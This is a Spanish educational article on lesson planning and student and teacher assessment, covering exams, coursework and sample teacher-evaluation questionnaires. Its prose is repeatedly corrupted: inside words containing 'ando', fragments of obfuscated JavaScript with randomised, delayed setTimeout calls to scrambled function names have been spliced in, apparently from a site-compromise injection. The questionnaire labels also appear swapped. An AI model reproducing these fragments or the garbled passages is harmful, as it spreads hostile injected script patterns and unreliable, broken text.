LA IMPORTANCIA DE LA PROGRAMACIÓN Y LA EVALUACIÓN

Autora: Beatriz Berrecosa Pérez

El objetivo de este artículo es conocer la importancia que tienen tanto la programación como la evaluación dentro de la actividad docente. Por eso, se ofrecen una serie de recomendaciones a tener en cuenta para que la acción formativa que vamos a llevar a cabo tenga éxito. Además se analizan detalladamente los métodos de evaluación más comunes, tales como el examen oral, el examen escrito o los trabajos realizados. Por último, también se adjuntan una serie de cuestionarios para realizar la evaluación al profesor.

Es muy importante ser conscientes de que una de las claves para el triunfo de una acción formativa es la programación. Ésta se puede definir como la enunciación de lo que se pretende realizar en lo que se pretende realizar en lo que respecta a diferentes apartados: objetivos, métodos, medios, temporalidad, etc. En definitiva, lo que se busca es que los objetivos se consigan de la manera más óptima posible. Debe respetarse siempre, aunque también debe ser flexible e irse adaptandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a las situaciones que vayan surgiendo.

En primer lugar, debemos fijar los objetivos que deseamos conseguir. A continuación, elegiríamos los temas que desarrollaremos en cada una de las sesiones, junto a las actividades prácticas que nos servirán para reforzar los contenidos vistos en clase. De manera continuada se deben ir verificandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que los temas que hemos seleccionado son coherentes y consecuentes con los objetivos que pretendíamos alcanzar.

Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando tengamos fijados los temas, podremos pasar a un nivel de programación más concreto. Para cada sesión deberemos elegir los métodos y los medios más adecuados para conseguir los objetivos planteados. Una buena opción seria reflejar todo lo que se ha comentado anteriormente en una ficha para cada sesión; así siempre existirá un control sobre lo que ya se ha hecho en clase y sobre lo que queda por hacer. A continuación se incluye un ejemplo de lo que podría recoger la ficha de seguimiento de una sesión. Debido a que mi especialidad es Lengua Castellana y Literatura, la ficha está enfocada a esa materia en concreto.

OBJETIVO METODOLOGÍA MATERIAL TIEMPO OBSERVACIONES

Estudiar la estructura de las diferentes clases de oraciones

- explicar la teoría Libro y fotocopias de apoyo

20’

- realizar ejercicios que apoyen la teoría explicada Cuaderno de clase

20’

- exponer las soluciones de las actividades planteadas

10’

Como podemos comprobar, la ficha recoge los objetivos que se quieren conseguir, los medios y los materiales que se van a utilizar. El uso de este tipo de fichas hace que el docente tenga controlado los contenidos que se han impartido y los que todavía quedan por impartir.

En general, todas las sesiones tendrán la misma estructura, que se divide en tres grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes apartados:

-       presentación e introducción, además de la revisión de la sesión anterior

-       desarrollo de los contenidos

-       conclusión

Además, podríamos tener en cuenta una serie de recomendaciones tales como revisar el material que se entrega a los alumnos o cumplir el horario de inicio y finalización de las sesiones.

Por otro lado, el último apartado en el diseño de una programación es la evaluación que, en un sentido general, se puede definir como “una actividad inherente a toda actividad humana intencional, por lo que debe ser sistemática, y que su objetivo es determinar el valor de algo” (Popham, 1990). La evaluación no solo debe hacerse a los alumnos, sino también a los profesores y al proceso de formación. Con todo ello, podremos verificar la efectiviadad del mismo, es decir, si se han conseguido o no los objetivos planteados y esto nos permitirá observar las posibilidades de mejora.

Con respecto a los alumnos, la evaluación permite conocer qué objetivos se han cumplido y cuáles no. Los medios que se emplean normalmente para la evaluación de los alumnos son el examen oral o escrito y los trabajos realizados. Normalmente, se suele llevar a cabo una evaluación continua, es decir, la que disminuye la importancia del examen final y en la que cobran más peso los exámenes parciales, los trabajos y la participación en clase. Esta forma de evaluación tiene como ventaja que tanto los alumnos como el profesor tienen información de los resultados que se van obteniendo a lo largo del proceso formativo y así pueden aplicar las medidas oportunas que consideren necesarias para mejorar los resultados.

A continuación veremos más detenidamente las peculiaridades de cada uno de los métodos de evaluación que podemos emplear como docentes:

-       examen escrito: puede ser de preguntas cerradas o abiertas, de respuesta corta o larga, etc. Permite comprobar si el alumno “sabe” a través de preguntas teóricas, y si “sabe hacer” a través de ejercicios para resolver. En este tipo de pruebas las preguntas deben estar formuladas de manera clara para evitar confusiones a los alumnos.

-       Examen oral: con esta prueba el docente puede conocer los conocimientos exactos que tienen los alumnos. Sin embargo, apenas se emplea debido al elevado número de alumnos que tiene cada profesor y a la gran cantidad de tiempo que se necesita para realizarlo. Otros aspectos negativos pueden ser que el alumno tímido puede verse perjudicado y que pude no ser una prueba homogénea para los alumnos. Por el contrario, puede resultar recomendable y positiva cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se trabaje con un grupo reducido de alumnos.

-       Trabajos: individuales o en grupo constituyen otra herramienta de evaluación. En los trabajos grupales, pueden surgir problemas si alguno de los componentes no trabaja al mismo nivel que el resto y, por lo tanto, el reparto de tareas y responsabilidades no es equitativo.

Además de la evaluación a los alumnos, también es conveniente la evaluación al docente. Concretamente, los alumnos pueden evaluar al profesor respecto a los siguientes parámetros:

-       claridad en las exposiciones

-       nivel de conocimiento de los temas impartidos

-       metodología empleada

-       calidad de los materiales proporcionados

Como ejemplo, dos cuestionarios de evaluación al profesor, uno de preguntas cerradas y otro de preguntas abiertas:

Personalidad 0 2 4 6 8 10
EMPATÍA
AUTOCRÍTICA
DISPONIBILIDAD
FLEXIBILIDAD
Nivel 0 2 4 6 8 10
CONOCIMIENTO DEL TEMA
ORGANIZACIÓN
RIGOR
Escenificación 0 2 4 6 8 10
MOVIMIENTOS
MIRADA
SILENCIOS
CONTESTACIÓN DE PREGUNTAS

-  Ejemplo de cuestionario con preguntas cerradas

Asignatura:

Profesor:

1)    Cita las características más positivas que veas en tu profesor en su papel de docente

2)    Cita las características que creas que tu profesor debe mejorar como docente

3)    Describe la impresión que tengas acerca de tu profesor

-       Ejemplo de cuestionario con preguntas abiertas

A modo de conclusión podemos decir que la evaluación es una de las etapas más importantes dentro del proceso de formación. Con ella controlamos la calidad de las programaciones y podremos realizar los cambios oportunos para conseguir los objetivos planteados.

Bibliografía

-       Amat, O. Aprender a enseñar. Gestión 2000. Barcelona. 2005

-       Popham, WJ. Problemas y ténicas de la evaluación educativa. Anaya. Madrid. 1980.

-       Tenbrink, T. Evaluación: guía práctica para profesores. Narcea. Madrid. 1981

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.